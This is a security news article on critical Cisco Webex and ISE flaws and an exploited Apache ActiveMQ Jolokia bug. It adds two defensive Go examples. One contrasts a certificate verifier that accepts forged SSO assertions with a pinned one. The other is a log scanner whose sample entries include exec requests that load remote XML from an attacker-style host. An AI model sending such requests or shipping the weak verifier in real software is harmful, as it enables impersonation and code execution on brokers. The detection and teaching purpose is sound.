Multiple critical software flaws
Cisco released fixes for critical flaws in Webex Services and Identity Services Engine, including a Webex improper certificate validation issue that needs customer-side action as well as the vendor patch. (bleepingcomputer.com) Researchers also flagged critical remote-code-execution vulnerabilities in Cisco ISE/ISE-PIC, four CVEs across two advisories, and Apache ActiveMQ CVE-2026-34197 was added to CISA's KEV list with a federal patch deadline of April 30, 2026. (gbhackers.com) (thehackernews.com)
A software flaw is a bug that can let outsiders slip past normal checks, and three newly disclosed cases put Cisco and Apache users on patch notice this week. (cisco.com)

Cisco said on April 15 that a Webex Services bug, tracked as CVE-2026-20184, could let an unauthenticated remote attacker impersonate any user in the service. The issue stems from improper certificate validation in single sign-on with Control Hub, and Cisco gave it a CVSS base score of 9.8 out of 10. (cisco.com) Certificates are digital ID cards for online systems; if software fails to check them correctly, it can trust a fake one, and in a single sign-on flow the fake one vouches for whoever the attacker wants to be. Cisco has already fixed the cloud service itself, but said customers who use trust anchors in their Webex single sign-on configuration must upload a new identity provider SAML certificate in Control Hub to avoid service interruption. (cisco.com)

Cisco also published two critical advisories for Identity Services Engine, the product many companies use to decide which users and devices get onto a network. In one April 15 advisory, CVE-2026-20147 and CVE-2026-20148 could let an authenticated remote attacker with valid administrative credentials execute code or traverse paths on Cisco ISE and ISE Passive Identity Connector (ISE-PIC). (cisco.com) In a separate April 15 advisory, CVE-2026-20180 and CVE-2026-20186 could let an authenticated remote attacker with at least Read Only Admin credentials execute commands on the underlying operating system of Cisco ISE. Cisco said successful exploitation in single-node deployments could knock the node offline and block new endpoints from authenticating to the network until it is restored. (cisco.com) Unlike the Webex flaw, the ISE bugs are not reachable by an unauthenticated outsider: the attacker must already hold admin-level credentials, so a leaked or weak administrator password is what turns them into a practical risk. Cisco said there are no workarounds for the ISE flaws and told customers to move to fixed software releases. (cisco.com)
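Cisco's advisory does not say how the Webex validation went wrong, so the following Go program is an added illustration of the general class, not Cisco's code or a description of CVE-2026-20184. It models a signed SSO assertion that carries its own signing certificate, the way a SAML response carries one in KeyInfo, and contrasts a verifier that trusts whatever certificate arrives with one that first binds that certificate to the operator's configured trust anchor. The Assertion type, the self-signed test certificates, the subject strings and the fingerprint pinning are assumptions for the example; real SAML verification also covers XML canonicalisation, audience and time conditions that this model omits.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// Assertion stands in for a signed SAML response: the claims, a signature
// over them, and the signer's certificate as carried in <ds:KeyInfo>.
// Deliberately simplified model (assumption), not a SAML implementation.
type Assertion struct {
	Subject   string
	Signature []byte
	Cert      *x509.Certificate
}

// selfSigned mints a self-signed P-256 certificate, as an IdP (or an attacker)
// would to sign assertions. Test-only material, generated in memory.
func selfSigned(cn string) (*ecdsa.PrivateKey, *x509.Certificate) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: cn},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return key, cert
}

// sign produces an assertion for subject, signed with key and carrying cert.
func sign(key *ecdsa.PrivateKey, cert *x509.Certificate, subject string) Assertion {
	digest := sha256.Sum256([]byte(subject))
	sig, err := ecdsa.SignASN1(rand.Reader, key, digest[:])
	if err != nil {
		panic(err)
	}
	return Assertion{Subject: subject, Signature: sig, Cert: cert}
}

// fingerprint is SHA-256 over the DER certificate, the value an operator pins
// when configuring a trust anchor.
func fingerprint(c *x509.Certificate) string {
	sum := sha256.Sum256(c.Raw)
	return hex.EncodeToString(sum[:])
}

// verifyWeak checks the signature with whatever certificate the message
// carries. The math is correct, yet any key the attacker controls passes.
func verifyWeak(a Assertion) error {
	pub, ok := a.Cert.PublicKey.(*ecdsa.PublicKey)
	if !ok {
		return errors.New("unsupported signing key type")
	}
	digest := sha256.Sum256([]byte(a.Subject))
	if !ecdsa.VerifyASN1(pub, digest[:], a.Signature) {
		return errors.New("signature does not verify")
	}
	return nil
}

// verifyPinned binds the embedded certificate to the configured IdP trust
// anchor and its validity window before trusting its key.
func verifyPinned(a Assertion, anchorFP string, now time.Time) error {
	if fingerprint(a.Cert) != anchorFP {
		return errors.New("signer is not the configured IdP trust anchor")
	}
	if now.Before(a.Cert.NotBefore) || now.After(a.Cert.NotAfter) {
		return errors.New("IdP certificate outside its validity window")
	}
	return verifyWeak(a)
}

func main() {
	idpKey, idpCert := selfSigned("idp.example.test")
	atkKey, atkCert := selfSigned("idp.example.test") // same name, attacker's key
	anchor := fingerprint(idpCert)
	now := time.Now()
	forged := sign(atkKey, atkCert, "admin@example.test")
	fmt.Println("weak:  ", verifyWeak(forged))                // <nil>: forgery accepted
	fmt.Println("pinned:", verifyPinned(forged, anchor, now)) // rejected
	fmt.Println("legit: ", verifyPinned(sign(idpKey, idpCert, "alice@example.test"), anchor, now))
}
```

The point of the pinned path is that the certificate inside the message is untrusted input: a matching common name proves nothing, and the verifier must compare against what the operator configured. That is also why Cisco's fix has a customer-side step: once the service stops accepting arbitrary certificates, the trust anchor in Control Hub has to be the real IdP certificate or valid logins fail too.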
Apache ActiveMQ users are dealing with a different problem: a message broker bug that turns a management feature into a code-execution path. Apache said CVE-2026-34197 affects ActiveMQ Broker before 5.19.4 and versions 6.0.0 through 6.2.2, and recommended upgrading to 5.19.4 or 6.2.3. (apache.org) Apache said the flaw sits in ActiveMQ Classic's Jolokia JMX-HTTP bridge, exposed at `/api/jolokia/` on the web console. An authenticated attacker could use allowed exec operations on ActiveMQ MBeans with a crafted URI to load a remote Spring XML context and trigger arbitrary code execution in the broker's Java process. (apache.org) Because the attacker only needs console credentials, the console login is the last barrier between a network-reachable broker and code execution, which is one more reason the web console should not be reachable from outside an administrative network.

CISA's Known Exploited Vulnerabilities catalog is the federal government's list of bugs seen in real-world attacks, and agencies use it to set patch deadlines. CISA says federal civilian agencies must follow Binding Operational Directive 22-01 for cataloged flaws, and the agency says all organizations should prioritize KEV-listed vulnerabilities in their patching plans. (cisa.gov 1) (cisa.gov 2)

Cisco said it was not aware of public announcements or malicious use of the Webex certificate bug as of its advisory update on April 16. The immediate to-do list is narrower than the headlines suggest: Webex customers need to check whether they use trust anchors and, if so, upload the new IdP certificate; ISE administrators need fixed releases; and ActiveMQ operators need to move off affected versions, since that one is already being exploited. (cisco.com 1) (cisco.com 2) (apache.org)
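The advisory describes the attack shape (an exec call on an MBean with a URI argument pointing at a remote Spring XML context) without naming the operation on this page, so the following Go program is an added example of what a detection over web-console access logs can key on; it is not Apache's code and does not reproduce the exploit. It normalises Jolokia's two request forms, the GET path form with its `!` escape for slashes and the JSON POST form, and flags `exec` requests whose arguments carry a remote URL. The AccessEntry records, the `exampleOperation` name, the 198.51.100.7 host and the URL heuristic are constructed assumptions; the first-order fix is still the upgrade.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// JolokiaRequest is the subset of a Jolokia request that matters here. Jolokia
// accepts the same request as a GET path
// (/api/jolokia/<type>/<mbean>/<operation>/<arg>/...) or as a JSON POST body.
type JolokiaRequest struct {
	Type      string        `json:"type"`
	MBean     string        `json:"mbean"`
	Operation string        `json:"operation"`
	Arguments []interface{} `json:"arguments"`
}

// AccessEntry is a constructed stand-in for a web-console access record with
// the POST body attached (assumption: real deployments must capture bodies).
type AccessEntry struct {
	Method, Path, Body string
}

const jolokiaPrefix = "/api/jolokia/"

// Assumed heuristic: an exec argument carrying a URL the broker could fetch.
var remoteURI = regexp.MustCompile(`(?i)\b(https?|ftp)://`)

// splitJolokiaPath splits a decoded GET path into Jolokia segments, honouring
// its "!" escape: "!/" is a literal slash and "!!" a literal "!".
func splitJolokiaPath(p string) []string {
	var segs []string
	var cur strings.Builder
	for i := 0; i < len(p); i++ {
		c := p[i]
		switch {
		case c == '!' && i+1 < len(p):
			i++
			cur.WriteByte(p[i])
		case c == '/':
			segs = append(segs, cur.String())
			cur.Reset()
		default:
			cur.WriteByte(c)
		}
	}
	return append(segs, cur.String())
}

// parseJolokia normalises a GET or POST entry into a JolokiaRequest.
func parseJolokia(e AccessEntry) (JolokiaRequest, error) {
	var req JolokiaRequest
	path := strings.SplitN(e.Path, "?", 2)[0]
	if !strings.HasPrefix(path, jolokiaPrefix) {
		return req, errors.New("not a jolokia request")
	}
	switch e.Method {
	case "GET":
		// The container percent-decodes before Jolokia splits, so do the same.
		raw, err := url.PathUnescape(strings.TrimPrefix(path, jolokiaPrefix))
		if err != nil {
			return req, err
		}
		segs := splitJolokiaPath(raw)
		if len(segs) < 2 {
			return req, errors.New("truncated jolokia path")
		}
		req.Type, req.MBean = segs[0], segs[1]
		if len(segs) > 2 {
			req.Operation = segs[2]
		}
		if len(segs) > 3 {
			for _, a := range segs[3:] {
				req.Arguments = append(req.Arguments, a)
			}
		}
	case "POST":
		if err := json.Unmarshal([]byte(e.Body), &req); err != nil {
			return req, err
		}
	default:
		return req, errors.New("unsupported method")
	}
	return req, nil
}

// isSuspicious flags exec calls whose arguments point the broker at a remote
// resource; read/list/search requests are never flagged.
func isSuspicious(req JolokiaRequest) (bool, string) {
	if !strings.EqualFold(req.Type, "exec") {
		return false, ""
	}
	for _, a := range req.Arguments {
		if s := fmt.Sprint(a); remoteURI.MatchString(s) {
			return true, fmt.Sprintf("exec %s on %s with remote URI %q", req.Operation, req.MBean, s)
		}
	}
	return false, ""
}

// scan returns one alert per suspicious entry; non-Jolokia entries are skipped.
func scan(entries []AccessEntry) []string {
	var alerts []string
	for _, e := range entries {
		req, err := parseJolokia(e)
		if err != nil {
			continue
		}
		if hit, why := isSuspicious(req); hit {
			alerts = append(alerts, why)
		}
	}
	return alerts
}

// Constructed sample traffic (not real captures); exampleOperation is a placeholder.
var sampleLog = []AccessEntry{
	{"GET", "/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost/TotalConnectionsCount", ""},
	{"GET", "/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/exampleOperation/http:!/!/198.51.100.7!/evil.xml", ""},
	{"POST", "/api/jolokia/", `{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","operation":"exampleOperation","arguments":["https://198.51.100.7/ctx.xml"]}`},
	{"POST", "/api/jolokia/", `{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","operation":"exampleOperation","arguments":["tcp://0.0.0.0:61617"]}`},
	{"GET", "/admin/queues.jsp", ""},
}

func main() {
	for _, a := range scan(sampleLog) {
		fmt.Println("ALERT:", a)
	}
}
```

Two things a practitioner should carry over from this: a URL-path-only log misses the POST form entirely, so the console's request bodies need to be captured for the rule to mean anything, and the `!` escaping means a naive substring match on `http://` in the raw path will miss the GET form. Either hit is a strong signal on a broker still on an affected version, and an unexpected `exec` from any source on a broker that only ever needs `read` is worth an alert on its own.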